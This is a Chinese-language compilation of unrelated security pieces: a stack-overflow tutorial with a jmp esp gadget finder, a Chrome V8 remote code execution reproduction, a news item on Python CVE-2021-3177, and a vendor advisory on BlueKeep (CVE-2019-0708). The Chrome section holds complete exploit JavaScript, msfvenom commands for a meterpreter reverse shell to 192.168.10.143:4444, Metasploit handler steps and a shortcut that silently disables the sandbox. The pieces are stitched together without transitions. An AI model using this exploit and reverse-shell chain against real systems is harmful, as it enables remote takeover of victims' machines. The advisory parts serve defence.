直接覆盖返回地址 

在栈空间中放置shellcode 最后把该函数的返回地址设置为我的shellcode的返回地址就能让程序返回时执行我的代码。

利用jmp esp 

如果shellcode只能放到dll的缓冲区中，或者有PE重定位，载入基地址会改变，这样我们用来覆盖return的地址就不能准确定位shellcode了。

把shellcode填入缓冲区
找到内存中任意一个jmp esp指令的地址覆盖掉原本的返回地址。
函数返回后被重定向执行jmp esp
因为这时候的esp指向了shellcode的起始地址所以会执行shellcode
这里shellcode是从低地址到高地址存放的。 

这种shellcode用jmp esp作为跳板，这样就不用担心重定位问题了 

下面是在dll中查找该语句的函数。



#include<windows.h>
#include<stdio.h>
#define DLL_NAME L"user32.dll"
void main()
{
    BYTE* ptr;
    int position, address;
    HINSTANCE handle;
    BOOL done_flag = FALSE;
    handle = LoadLibrary(DLL_NAME);//loadLibrary函数默认是宽字符，用TEXT("string")或者L"string"
    if (!handle)
    {
        printf("load dll erro!");
        exit(0);
    }
    ptr = (BYTE*)handle;//转化指针类型用来控制指针++所指向的位置
    for (position = 0; !done_flag; position++)//用position来表示偏移
    {
        try
        {
            if (ptr[position] == 0xFF && ptr[position + 1] == 0xE4)//0xffe4是jmp esp的机器码
            {
                int address = (int)ptr + position;//输出地址要强制转化为int
                printf("%x\n", address);
            }
        }
        catch (...)
        {
            int address = (int)ptr + position;
            printf("end of 0x%x", address);
            done_flag = TRUE;
        }
    }
}

存放shellcode 

如何安全地存放shellcode也是一个重要的问题 

存放的一般方法： 

 1. 存放在缓冲区中例如buff[44]存进去很显然缺点是shellcode必须足够小 

2.放在返回地址之后，这样可以存放大量代码，但是会破坏原程序尽量不要用的好 

3.放在esp上边注意要用一部分空白来填充不然入栈指令会破坏shellcode 

除了jmp esp之外，mov eax,esp  jmp eax也能达到跳转的目的

碰运气 

如果不允许使用jmp而静态覆盖地址来覆盖又不太准确，这时候可以淹没一大片内存区域把shellcode放到一大片nop后面这样如果程序会走到任意一个nop这里就会执行shellcode了 

用一大片返回地址来覆盖真正的返回地址，总有一个会命中的

补充：strcat(*str1,*str2)把str2链接到str1后面(中间没有\0)  一般情况下str1是在缓冲区中的 

这就给我们的溢出构造了条件

Chrome远程代码执行复现
漏洞简介
Google Chrome 远程代码执行漏洞。未经身份验证的攻击者利用该漏洞，可通过精心构造恶意页面，诱导受害者访问，实现对浏览器的远程代码执行攻击 , 但攻击者单独利用该漏洞无法实现沙盒（SandBox）逃逸。沙盒是 Google Chrome 浏览器的安全边界，防止恶意攻击代码破坏用户系统或者浏览器其他页面。
Google Chrome 浏览器默认开启沙盒保护模式。
影响范围
Google Chrome < = 89.0.4389.114
使用Chrome内核的其他浏览器。
利用条件
关闭沙箱模式    -no-sandbox
漏洞复现
首先我们生成shellcode
msfvenom -a x64 -p windows/x64/exec CMD="msg.exe administrator hi" EXITFUNC=thread -f num

使用msg给发送消息


修改poc，在shellcode区域写入自己生成的shellcode

<script>
    function gc() {
        for (var i = 0; i < 0x80000; ++i) {
            var a = new ArrayBuffer();
        }
    }
    let shellcode = [shellcode 区域];
    var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);
    var wasmModule = new WebAssembly.Module(wasmCode);
    var wasmInstance = new WebAssembly.Instance(wasmModule);
    var main = wasmInstance.exports.main;
    var bf = new ArrayBuffer(8);
    var bfView = new DataView(bf);
    function fLow(f) {
        bfView.setFloat64(0, f, true);
        return (bfView.getUint32(0, true));
    }
    function fHi(f) {
        bfView.setFloat64(0, f, true);
        return (bfView.getUint32(4, true))
    }
    function i2f(low, hi) {
        bfView.setUint32(0, low, true);
        bfView.setUint32(4, hi, true);
        return bfView.getFloat64(0, true);
    }
    function f2big(f) {
        bfView.setFloat64(0, f, true);
        return bfView.getBigUint64(0, true);
    }
    function big2f(b) {
        bfView.setBigUint64(0, b, true);
        return bfView.getFloat64(0, true);
    }
    class LeakArrayBuffer extends ArrayBuffer {
        constructor(size) {
            super(size);
            this.slot = 0xb33f;
        }
    }
    function foo(a) {
        let x = -1;
        if (a) x = 0xFFFFFFFF;
        var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));
        arr.shift();
        let local_arr = Array(2);
        local_arr[0] = 5.1;//4014666666666666
        let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8
        arr[0] = 0x1122;
        return [arr, local_arr, buff];
    }
    for (var i = 0; i < 0x10000; ++i)
        foo(false);
    gc(); gc();
    [corrput_arr, rwarr, corrupt_buff] = foo(true);
    corrput_arr[12] = 0x22444;
    delete corrput_arr;
    function setbackingStore(hi, low) {
        rwarr[4] = i2f(fLow(rwarr[4]), hi);
        rwarr[5] = i2f(low, fHi(rwarr[5]));
    }
    function leakObjLow(o) {
        corrupt_buff.slot = o;
        return (fLow(rwarr[9]) - 1);
    }
    let corrupt_view = new DataView(corrupt_buff);
    let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff);
    let idx0Addr = corrupt_buffer_ptr_low - 0x10;
    let baseAddr = (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000;
    let delta = baseAddr + 0x1c - idx0Addr;
    if ((delta % 8) == 0) {
        let baseIdx = delta / 8;
        this.base = fLow(rwarr[baseIdx]);
    } else {
        let baseIdx = ((delta - (delta % 8)) / 8);
        this.base = fHi(rwarr[baseIdx]);
    }
    let wasmInsAddr = leakObjLow(wasmInstance);
    setbackingStore(wasmInsAddr, this.base);
    let code_entry = corrupt_view.getFloat64(13 * 8, true);
    setbackingStore(fLow(code_entry), fHi(code_entry));
    for (let i = 0; i < shellcode.length; i++) {
        corrupt_view.setUint8(i, shellcode[i]);
    }
    main();
</script>

保存为  shell.html  文件


使用 关闭沙箱启动 chrome


打开 我们的shell.html文件

我们已经成功的执行 msg 命令
我们设置一个快捷方式让它能双击就自启动
我们编辑快捷方式， 在目标位置写入如下

C:\Users\Administrator\AppData\Local\Google\Chrome\Application\chrome.exe -no-sandbox file:///C:/Users/Administrator/Desktop/shell.html

这样双击打开 shell.html文件的时候 就自动的关闭沙箱启动
直接打开即可弹出消息

接下来我们使用shellcode 上线msf
生成反弹shell的shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.143 lport=4444 -f csharp -o payload.txt 


修改shell.html的shellcode部分

msf开启监听
msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 192.168.10.143

msf6 exploit(multi/handler) > run

关闭沙箱打开，我们的 shell.html


我们已经成功拿到了主机的一个meterpreter会话

近日，Python 软件基金会(PSF)释出 Python3.8.8 和 3.9.2  版本，该版本主要修复了两个值得注意的安全漏洞，其中一个名为“CVE-2021-3177”的漏洞容易被攻击者远程利用，基于代码执行可让计算机脱机。
乍一看，让计算机脱机并不是什么大事，不过，倘若真的被有心之人利用该漏洞，那么，使用 Python 的用户难免会有一段糟心的体验。
对此，在 Python3.8.8 和或 3.9.2 RC 版本刚刚发布三天之后，在部分用户对安全漏洞担忧的压力下，新版 Python 加快了发布的进程。同时，PSF 敦促 Python 用户尽快将系统升级到 Python 3.8.8 或 3.9.2，特别是需要解决被跟踪为 CVE-2021-3177 的远程代码执行(RCE)漏洞。
Python 发布团队表示："自从宣布 Python 3.8.8 和 3.9.2 RC 版本发布以来，我们收到了来自终端用户的一些关于 CVE-2021-3177 安全方面的询问，并敦促我们加快最终版本的发布。”
具体的漏洞在于，Python 3.x 到 3.9.1 的 ctypes/callproc.c 中 PyCArg_repr 具有缓冲溢出，这可能导致远程代码执行。
它也会影响到 "接受浮点数作为不信任的输入的 Python 应用程序，如 c_double. param 的1e300 参数所示。
该 Bug 的发生是因为不安全地使用了"sprintf"。影响之所以广泛，因为 Python 已预装安装到了多个 Linux 发行版和 Windows 10 系统中。
当前，各种 Linux 发行版(如 Debian)已经向后移植了安全补丁，以确保屏蔽内置版本的 Python。
RedHat 也发布公告表示，该漏洞是常见的内存缺陷。“在 Python 内提供的 ctypes 模块中发现了基于堆栈的缓冲区溢出。使用 ctypes 而不仔细验证传递给它的输入的应用程序可能容易受到此漏洞的攻击，这将允许攻击者通过缓冲区溢出并使应用程序奔溃。”
同时红帽也针对自家的版本进行了安全版本说明：
虽然远程代码执行漏洞是一则坏消息，不过，红帽官方指出这个漏洞带来的最大威胁是对系统可用性的威胁，这意味着攻击者可能只能发动拒绝服务攻击，简单来讲，就是让计算机停止提供服务。
不过，为了避免一些不必要的麻烦，还是呼吁大家尽快升级。
Python 新版下载地址：https://www.python.org/downloads/

	

2019年9月7日凌晨，深信服安全团队监测到关于CVE-2019-0708相关情报，该情报披露CVE-2019-0708漏洞利用代码，该EXP可以通过RDP协议进行远程代码执行攻击。官方描述此漏洞相关危害可参考2017年WannaCry事件，深信服强烈建议用户及时安装补丁以避免受到损失。
漏洞名称：Remote Desktop Protocol漏洞
威胁等级：严重
影响范围：Windows XP;Windows 7 ;Windows Server 2003;Windows Server 2008;Windows Server 2008 R2
漏洞类型：任意代码执行漏洞
利用难度：容易
漏洞概述
CVE-2019-0708，属于任意代码远程执行漏洞，当未经身份验证的攻击者使用RDP连接到目标系统并发送特制请求时，即可以触发该漏洞。此漏洞属于预身份验证，无需用户交互，成功利用此漏洞的攻击者可以安装应用程序，查看、更改或删除数据或创建具有完全用户权限的新账户。
由于该漏洞可能导致的后果较为严重，今年5月份，深信服安全团队在追踪到该漏洞情报时已经第一时间向广大用户推送预警，并提供相应的防范措施：
漏洞预警 | Remote Desktop Protocol任意代码执行漏洞(CVE-2019-0708)
目前，由于EXP的公开发布，恶意攻击者还很有可能利用该漏洞编写定制的恶意软件， 利用此漏洞的恶意软件传播影响引发类似2017年WannaCry恶意软件遍布全球的事件，广大用户需要更加警惕利用该漏洞的恶意软件的出现，提前做好预防措施。
漏洞分析
成功利用漏洞的前提是将名称为“MS_T120”的静态信道成功绑定到正常信道以外。由于微软官方在内部会使用一个名为MS_T120的信道，因此此信道理论上不应该接收任意消息。
RDP的内部组件有很多，包括svchost.exe中的几个用户模式的dll，以及几个内核模式的驱动程序。漏洞触发的原因是攻击者在MS_T120信道上发送消息，这将导致termdd.sys驱动程序中触发一个双重释放漏洞(free-after-free)。
在完成RDP协议的握手过程后，将开始向已经绑定的各个信道中发送消息。MS_T120信道的消息是由用户模式组件——rdpwsx.dll进行管理，该dll创建一个线程，该线程将在函数rdpwsx!IoThreadFunc中进行循环，通过I/O端口读取消息。
数据通过I/O数据包传入后，将进入rdpwsx!MCSPortData 函数进行处理：
从函数中可以看到，在rdpwsx!MCSPortData 函数中，有两个opcode：0x0和0x2。如果opcode为0x2，则调用rdpwsx！HandleDisconnectProviderIndication函数执行清理动作，然后使用rdpwsx！MCSChannelClose关闭通道。
从理论上来说，发送的数据包大小都在合法范围的MS_T120消息，将会正常关闭MS_T120信道，并断开连接程序(此时opcode为0x2)，并且进行清理操作，此时将不会产生远程代码执行和蓝屏崩溃的风险。如果发送的数据包大小无效，就会导致远程代码执行和拒绝服务。
漏洞复现
根据该EXP的发布者称，该EXP针对Windows 7和Windows Server 2008 R2 x64。深信服千里目第一时间进行了复现，证实该EXP确实可导致任意代码执行。
该EXP被发布者在Metasploit的官方Github的Pull Request中，但尚未加载进Metasploit的官方框架中。
如上图中所示，按照Metaploit的正常使用流程即可加载该EXP。RHOSTS参数指定目标主机，target参数指定目标主机的系统版本，目前只有Windows 7 和 Windows Server 2008 R2两个版本。加载EXP后，执行，即可获取目标主机的权限。
影响范围
目前受影响的Windows版本：
Microsoft Windows XP
Microsoft Windows Server 2008 R2 for x64-based Systems SP1
Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2003
Microsoft Windows 7 for x64-based Systems SP1
Microsoft Windows 7 for 32-bit Systems SP1
解决方案
漏洞修复
1、及时安装微软发布的安全更新补丁：
Microsoft官方已经在 2019年5月14日修复了该漏洞，用户可以通过安装微软的安全更新来给系统打上安全补丁，下载地址为：
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
同时针对已不受微软更新支持的系统Windows Server 2003和Windows XP提供的安全更新，下载地址:
https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708
2、缓解措施(在无法及时安装微软安全更新的情况下作为临时性解决方案)：
(1)若用户不需要用到远程桌面服务，建议禁用该服务。
(2)开启网络级别身份验证(NLA)，此方案适用于Windows 7, Windows Server 2008, Windows Server 2008 R2。
以上缓解措施只能暂时性针对该漏洞对系统进行部分缓解，强烈建议在条件允许的情况下及时安装微软安全更新。
深信服解决方案
1、深信服云眼在漏洞爆发之初，已完成检测更新，对所有用户网站探测，保障用户安全。不清楚自身业务是否存在漏洞的用户，可注册信服云眼账号，获取30天免费安全体验。
注册地址为：http://saas.sangfor.com.cn
2、深信服云镜在漏洞爆发的第一时间就完成从云端下发本地检测更新，部署云镜的用户只需选择紧急漏洞检测，即可轻松、快速检测此高危风险。
3、深信服EDR漏洞规则库紧急更新，支持Remote Desktop Protocol任意代码执行漏洞(CVE-2019-0708)的检测和补丁分发，漏洞规则库版本：20190515185804。联网客户可直接在线更新。 离线规则库已在5月16日上传至深信服社区，有需要的客户请到深信服社区下载。
4、深信服推出安全运营服务，通过以“人机共智”的服务模式帮助用户快速扩展安全能力，针对此次紧急漏洞，安全运营服务已在5月份进行漏洞检测、安全设备策略检查，目前针对此次EXP，现已再次进行漏洞检测，确保第一时间检测安全风险以及更新策略，防范此类安全风险。
时间轴
2019/5/14
Microsoft发布安全更新公告并披露漏洞
2019/5/15
深信服官方微信及千里目安全实验室发布漏洞预警
2019/5/22
深信服千里目实验室根据漏洞跟踪分析结果发布二次漏洞预警
2019/5/30
深信服千里目实验室发布CVE-2019-0708攻击趋势分析
2019/6/29
深信服安全研究团队针对某特定版本构造出EXP，证实该漏洞影响巨大，再次发布预警
2019/9/7
深信服安全研究团队监测到EXP披露情报，对EXP复现验证，证实该EXP可导致服务器远程代码执行，特再次发布预警，提供解决方案给广大企业用户
咨询与服务
您可以通过以下方式联系我们，获取关于
CVE-2019-0708漏洞的免费咨询及支持服务：
1)拨打电话400-630-6430转6号线
2)关注【深信服技术服务】微信公众号，选择“智能服务”菜单，进行咨询
3)PC端访问深信服区 
bbs.sangfor.com.cn，选择右侧智能客服，进行咨询